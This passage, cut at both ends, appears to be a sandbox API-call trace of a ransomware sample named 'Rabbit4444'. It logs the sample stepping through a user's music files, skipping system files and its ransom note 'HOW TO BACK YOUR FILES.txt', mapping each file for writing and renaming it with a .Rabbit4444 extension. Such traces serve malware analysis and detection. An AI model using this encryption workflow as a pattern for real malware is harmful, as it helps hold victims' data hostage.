returned -1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="ids.txt") returned -1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="NTUSER.DAT") returned -1 [0049.057] lstrcpyW (in: lpString1=0x130eba2, lpString2="ahtik 3dEIDK LesPgbT.mp3" | out: lpString1="ahtik 3dEIDK LesPgbT.mp3") returned="ahtik 3dEIDK LesPgbT.mp3" [0049.057] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\ahtik 3dEIDK LesPgbT.mp3", dwFileAttributes=0x0) returned 1 [0049.058] lstrlenW (lpString="ahtik 3dEIDK LesPgbT.mp3") returned 24 [0049.058] lstrlenW (lpString="Rabbit4444") returned 10 [0049.058] lstrcmpiW (lpString1="esPgbT.mp3", lpString2="Rabbit4444") returned -1 [0049.058] lstrlenW (lpString=".dll") returned 4 [0049.058] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.058] lstrlenW (lpString=".lnk") returned 4 [0049.058] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.058] lstrlenW (lpString=".ini") returned 4 [0049.058] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.058] lstrlenW (lpString=".sys") returned 4 [0049.058] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\ahtik 3dEIDK LesPgbT.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\ahtik 3deidk lespgbt.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.058] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.058] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14036884891) returned 1 [0049.058] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=68106) returned 1 [0049.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0049.058] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10d10, lpName=0x0) returned 0x298 [0049.058] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10d10) returned 0x70000 [0049.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.060] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.061] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14037220592) returned 1 [0049.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0049.062] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.062] CloseHandle (hObject=0x298) returned 1 [0049.062] CloseHandle (hObject=0x278) returned 1 [0049.065] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\ahtik 3dEIDK LesPgbT.mp3.Rabbit4444") returned 88 [0049.065] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\ahtik 3dEIDK LesPgbT.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\ahtik 3deidk lespgbt.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\ahtik 3dEIDK LesPgbT.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\ahtik 3deidk lespgbt.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0049.065] InterlockedExchangeAdd (in: Addend=0xff618, Value=68112 | out: Addend=0xff618) returned 19490960 [0049.065] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3468 [0049.065] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x522ebbf0, ftCreationTime.dwHighDateTime=0x1d4cf1e, ftLastAccessTime.dwLowDateTime=0xe2fffb90, ftLastAccessTime.dwHighDateTime=0x1d4ce41, ftLastWriteTime.dwLowDateTime=0xe2fffb90, ftLastWriteTime.dwHighDateTime=0x1d4ce41, nFileSizeHigh=0x0, nFileSizeLow=0x84e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GXnNaU1iM6.wav", cAlternateFileName="GXNNAU~1.WAV")) returned 1 [0049.065] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="Rabbit4444.exe") returned -1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2=".") returned 1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="..") returned 1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="windows") returned -1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="bootmgr") returned 1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="pagefile.sys") returned -1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="boot") returned 1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="ids.txt") returned -1 [0049.066] lstrcmpiW (lpString1="GXnNaU1iM6.wav", lpString2="NTUSER.DAT") returned -1 [0049.066] lstrcpyW (in: lpString1=0x130eba2, lpString2="GXnNaU1iM6.wav" | out: lpString1="GXnNaU1iM6.wav") returned="GXnNaU1iM6.wav" [0049.066] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\GXnNaU1iM6.wav", dwFileAttributes=0x0) returned 1 [0049.066] lstrlenW (lpString="GXnNaU1iM6.wav") returned 14 [0049.066] lstrlenW (lpString="Rabbit4444") returned 10 [0049.066] lstrcmpiW (lpString1="aU1iM6.wav", lpString2="Rabbit4444") returned -1 [0049.066] lstrlenW (lpString=".dll") returned 4 [0049.066] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.066] lstrlenW (lpString=".lnk") returned 4 [0049.066] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.066] lstrlenW (lpString=".ini") returned 4 [0049.066] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.066] lstrlenW (lpString=".sys") returned 4 [0049.066] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.066] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\GXnNaU1iM6.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\gxnnau1im6.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.066] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.066] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14037726329) returned 1 [0049.067] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=34020) returned 1 [0049.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0049.067] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x87f0, lpName=0x0) returned 0x298 [0049.067] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x87f0) returned 0x70000 [0049.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.068] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14037899032) returned 1 [0049.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0049.068] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.069] CloseHandle (hObject=0x298) returned 1 [0049.069] CloseHandle (hObject=0x278) returned 1 [0049.072] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\GXnNaU1iM6.wav.Rabbit4444") returned 78 [0049.072] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\GXnNaU1iM6.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\gxnnau1im6.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\GXnNaU1iM6.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\gxnnau1im6.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.072] InterlockedExchangeAdd (in: Addend=0xff618, Value=34032 | out: Addend=0xff618) returned 19559072 [0049.072] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3471 [0049.072] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d18ca0, ftCreationTime.dwHighDateTime=0x1d4d1de, ftLastAccessTime.dwLowDateTime=0xb345cb80, ftLastAccessTime.dwHighDateTime=0x1d4c858, ftLastWriteTime.dwLowDateTime=0xb345cb80, ftLastWriteTime.dwHighDateTime=0x1d4c858, nFileSizeHigh=0x0, nFileSizeLow=0x18df4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lxupC1v-qiWR2UlBD.wav", cAlternateFileName="LXUPC1~1.WAV")) returned 1 [0049.072] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.072] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="Rabbit4444.exe") returned -1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2=".") returned 1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="..") returned 1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="windows") returned -1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="bootmgr") returned 1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="pagefile.sys") returned -1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="boot") returned 1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="ids.txt") returned 1 [0049.073] lstrcmpiW (lpString1="lxupC1v-qiWR2UlBD.wav", lpString2="NTUSER.DAT") returned -1 [0049.073] lstrcpyW (in: lpString1=0x130eba2, lpString2="lxupC1v-qiWR2UlBD.wav" | out: lpString1="lxupC1v-qiWR2UlBD.wav") returned="lxupC1v-qiWR2UlBD.wav" [0049.073] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\lxupC1v-qiWR2UlBD.wav", dwFileAttributes=0x0) returned 1 [0049.073] lstrlenW (lpString="lxupC1v-qiWR2UlBD.wav") returned 21 [0049.073] lstrlenW (lpString="Rabbit4444") returned 10 [0049.073] lstrcmpiW (lpString1="R2UlBD.wav", lpString2="Rabbit4444") returned -1 [0049.073] lstrlenW (lpString=".dll") returned 4 [0049.073] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.073] lstrlenW (lpString=".lnk") returned 4 [0049.073] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.073] lstrlenW (lpString=".ini") returned 4 [0049.073] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.073] lstrlenW (lpString=".sys") returned 4 [0049.073] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.073] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\lxupC1v-qiWR2UlBD.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\lxupc1v-qiwr2ulbd.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.073] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.073] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14038421803) returned 1 [0049.074] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=101876) returned 1 [0049.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0049.074] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19100, lpName=0x0) returned 0x298 [0049.074] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19100) returned 0x70000 [0049.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.078] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14038834627) returned 1 [0049.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0049.078] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.079] CloseHandle (hObject=0x298) returned 1 [0049.079] CloseHandle (hObject=0x278) returned 1 [0049.082] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\lxupC1v-qiWR2UlBD.wav.Rabbit4444") returned 85 [0049.082] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\lxupC1v-qiWR2UlBD.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\lxupc1v-qiwr2ulbd.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\lxupC1v-qiWR2UlBD.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\lxupc1v-qiwr2ulbd.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.082] InterlockedExchangeAdd (in: Addend=0xff618, Value=101888 | out: Addend=0xff618) returned 19593104 [0049.082] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 3472 [0049.082] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca852a00, ftCreationTime.dwHighDateTime=0x1d4c5ee, ftLastAccessTime.dwLowDateTime=0x10d049e0, ftLastAccessTime.dwHighDateTime=0x1d4ccc0, ftLastWriteTime.dwLowDateTime=0x10d049e0, ftLastWriteTime.dwHighDateTime=0x1d4ccc0, nFileSizeHigh=0x0, nFileSizeLow=0xa0cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OAj iWDFaki.m4a", cAlternateFileName="OAJIWD~1.M4A")) returned 1 [0049.082] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.082] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.082] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.082] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2=".") returned 1 [0049.082] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="..") returned 1 [0049.083] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="windows") returned -1 [0049.083] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="bootmgr") returned 1 [0049.083] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="pagefile.sys") returned -1 [0049.083] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="boot") returned 1 [0049.083] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="ids.txt") returned 1 [0049.083] lstrcmpiW (lpString1="OAj iWDFaki.m4a", lpString2="NTUSER.DAT") returned 1 [0049.083] lstrcpyW (in: lpString1=0x130eba2, lpString2="OAj iWDFaki.m4a" | out: lpString1="OAj iWDFaki.m4a") returned="OAj iWDFaki.m4a" [0049.083] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\OAj iWDFaki.m4a", dwFileAttributes=0x0) returned 1 [0049.083] lstrlenW (lpString="OAj iWDFaki.m4a") returned 15 [0049.083] lstrlenW (lpString="Rabbit4444") returned 10 [0049.083] lstrcmpiW (lpString1="WDFaki.m4a", lpString2="Rabbit4444") returned 1 [0049.083] lstrlenW (lpString=".dll") returned 4 [0049.083] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.083] lstrlenW (lpString=".lnk") returned 4 [0049.083] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.083] lstrlenW (lpString=".ini") returned 4 [0049.083] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.083] lstrlenW (lpString=".sys") returned 4 [0049.083] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\OAj iWDFaki.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\oaj iwdfaki.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.083] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.083] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14039410100) returned 1 [0049.083] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=41165) returned 1 [0049.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0049.084] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa3d0, lpName=0x0) returned 0x298 [0049.084] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa3d0) returned 0x70000 [0049.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.085] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14039609961) returned 1 [0049.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0049.085] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.086] CloseHandle (hObject=0x298) returned 1 [0049.086] CloseHandle (hObject=0x278) returned 1 [0049.088] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\OAj iWDFaki.m4a.Rabbit4444") returned 79 [0049.088] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\OAj iWDFaki.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\oaj iwdfaki.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\OAj iWDFaki.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\oaj iwdfaki.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.089] InterlockedExchangeAdd (in: Addend=0xff618, Value=41168 | out: Addend=0xff618) returned 19694992 [0049.089] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3476 [0049.089] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfff42c50, ftCreationTime.dwHighDateTime=0x1d4cdf9, ftLastAccessTime.dwLowDateTime=0x3dafef00, ftLastAccessTime.dwHighDateTime=0x1d4d333, ftLastWriteTime.dwLowDateTime=0x3dafef00, ftLastWriteTime.dwHighDateTime=0x1d4d333, nFileSizeHigh=0x0, nFileSizeLow=0xe5d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oJFUvhouKderw.m4a", cAlternateFileName="OJFUVH~1.M4A")) returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2=".") returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="..") returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="windows") returned -1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="bootmgr") returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="pagefile.sys") returned -1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="boot") returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="ids.txt") returned 1 [0049.089] lstrcmpiW (lpString1="oJFUvhouKderw.m4a", lpString2="NTUSER.DAT") returned 1 [0049.089] lstrcpyW (in: lpString1=0x130eba2, lpString2="oJFUvhouKderw.m4a" | out: lpString1="oJFUvhouKderw.m4a") returned="oJFUvhouKderw.m4a" [0049.089] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\oJFUvhouKderw.m4a", dwFileAttributes=0x0) returned 1 [0049.089] lstrlenW (lpString="oJFUvhouKderw.m4a") returned 17 [0049.089] lstrlenW (lpString="Rabbit4444") returned 10 [0049.089] lstrcmpiW (lpString1="uKderw.m4a", 